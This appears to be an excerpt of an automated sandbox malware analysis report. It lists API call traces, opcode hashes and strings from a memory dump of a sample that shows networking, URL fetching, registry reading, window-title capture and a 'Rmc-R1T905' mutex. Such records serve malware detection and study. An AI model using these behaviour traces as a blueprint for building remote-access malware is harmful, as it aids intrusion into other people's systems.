                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3919263394-0
                                                                                                                                                                                                                              • Opcode ID: b60cbf6297e9a3f4f3584772fc93096cb31a77e7bd5814ad1416a09da33a0235
                                                                                                                                                                                                                              • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b60cbf6297e9a3f4f3584772fc93096cb31a77e7bd5814ad1416a09da33a0235
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CountEventTick
                                                                                                                                                                                                                              • String ID: >G
                                                                                                                                                                                                                              • API String ID: 180926312-1296849874
                                                                                                                                                                                                                              • Opcode ID: 7c6a44061e9afe9fff83c1bbccc31e13db7ae2fe2889247a585cb4580a236ccf
                                                                                                                                                                                                                              • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c6a44061e9afe9fff83c1bbccc31e13db7ae2fe2889247a585cb4580a236ccf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • connect.WS2_32(?,00000000,00000000), ref: 004042A5
                                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastLocalTimeconnect
                                                                                                                                                                                                                              • String ID: 8TF
                                                                                                                                                                                                                              • API String ID: 227477821-2488340943
                                                                                                                                                                                                                              • Opcode ID: 9751730a20fa088fec8e6013bdd2b335ea0d8d293a425dba33bf7e33820ff6fc
                                                                                                                                                                                                                              • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9751730a20fa088fec8e6013bdd2b335ea0d8d293a425dba33bf7e33820ff6fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,004664C4,00000000), ref: 0041B16C
                                                                                                                                                                                                                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,004664C4,00000000), ref: 0041B173
                                                                                                                                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,00000000,00000032,00000000,0046662C,00000000,0000000E,00000000,0046556C,00000003), ref: 0041A4D9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                                                                              • String ID: (32 bit)$ (64 bit)
                                                                                                                                                                                                                              • API String ID: 782494840-3091455541
                                                                                                                                                                                                                              • Opcode ID: 346ab9ae9c80d7a9f77903b2ea9fb5dba23ee93fe6e32e9f2add828796569abe
                                                                                                                                                                                                                              • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 346ab9ae9c80d7a9f77903b2ea9fb5dba23ee93fe6e32e9f2add828796569abe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,0046662C,00000000,0000000E,00000000,0046556C,00000003), ref: 0040BEE6
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                              • String ID: Rmc-R1T905
                                                                                                                                                                                                                              • API String ID: 1925916568-946744068
                                                                                                                                                                                                                              • Opcode ID: 4fc6c8ab555f373811983012bc0278dbf8eaec47087625f02d3033a79dd31813
                                                                                                                                                                                                                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4fc6c8ab555f373811983012bc0278dbf8eaec47087625f02d3033a79dd31813
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,0046B95C,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$Open$FileRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 72386350-0
                                                                                                                                                                                                                              • Opcode ID: 34aca5fb96028618d05bd95894b3540a1d7e013c3fd070f7f99fd810fd916618
                                                                                                                                                                                                                              • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34aca5fb96028618d05bd95894b3540a1d7e013c3fd070f7f99fd810fd916618
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                                                                                              • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseEventHandleclosesocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 803913606-0
                                                                                                                                                                                                                              • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                                                                                                                                                              • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,00000000), ref: 00404946
                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000), ref: 00404994
                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00003B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2532271599-0
                                                                                                                                                                                                                              • Opcode ID: e7e72b23170dc0a771de83702efdeb52cdfa37f610b082ed52130a5ef7c9dc86
                                                                                                                                                                                                                              • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7e72b23170dc0a771de83702efdeb52cdfa37f610b082ed52130a5ef7c9dc86
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                                                                                              • Opcode ID: a4cfaa0bc036f6297b31860654aeca297227e6615f7ad86a9e1c4f74b1318917
                                                                                                                                                                                                                              • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4cfaa0bc036f6297b31860654aeca297227e6615f7ad86a9e1c4f74b1318917
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                                                                                              • Opcode ID: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                                                                                                                                                                                              • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                                                                                              • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                                                              • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                                                                                              • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                                                                                                              • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 1890195054-2766056989
                                                                                                                                                                                                                              • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                                                                                              • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • socket.WS2_32(00000000,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateEventStartupsocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1953588214-0
                                                                                                                                                                                                                              • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                                                                                              • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                                                                                                                                                • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,?,>C,?,?,?,?,?,?,?,?,00433E09,?,0046D5EC), ref: 00437C37
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3476068407-0
                                                                                                                                                                                                                              • Opcode ID: 41f5bfb3cf2b31f65518166d0ab32b8bf848d4a3699c0758e808abc190c4af71
                                                                                                                                                                                                                              • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41f5bfb3cf2b31f65518166d0ab32b8bf848d4a3699c0758e808abc190c4af71
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$ForegroundText
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 29597999-0
                                                                                                                                                                                                                              • Opcode ID: da59836496d8ff89768ab60032630715300c65a21ebecdd14f5850d887cc1f1d
                                                                                                                                                                                                                              • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da59836496d8ff89768ab60032630715300c65a21ebecdd14f5850d887cc1f1d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongNamePath
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 82841172-0
                                                                                                                                                                                                                              • Opcode ID: 0aed9ec59981cee5dc30913d76a2f12fed1bf19adaefaa5d03a6754d969e8596
                                                                                                                                                                                                                              • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0aed9ec59981cee5dc30913d76a2f12fed1bf19adaefaa5d03a6754d969e8596
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                              • Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                                                                                                              • Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00446B31
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: e1cbf0f418dbd952f962d5c9e60cb55fb82008d236692bd9a6b06c1f3f012db4
                                                                                                                                                                                                                              • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1cbf0f418dbd952f962d5c9e60cb55fb82008d236692bd9a6b06c1f3f012db4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Startup
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 724789610-0
                                                                                                                                                                                                                              • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                                                              • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Deallocate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1075933841-0
                                                                                                                                                                                                                              • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                                                              • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                                                                                                                              Memory Dump Source
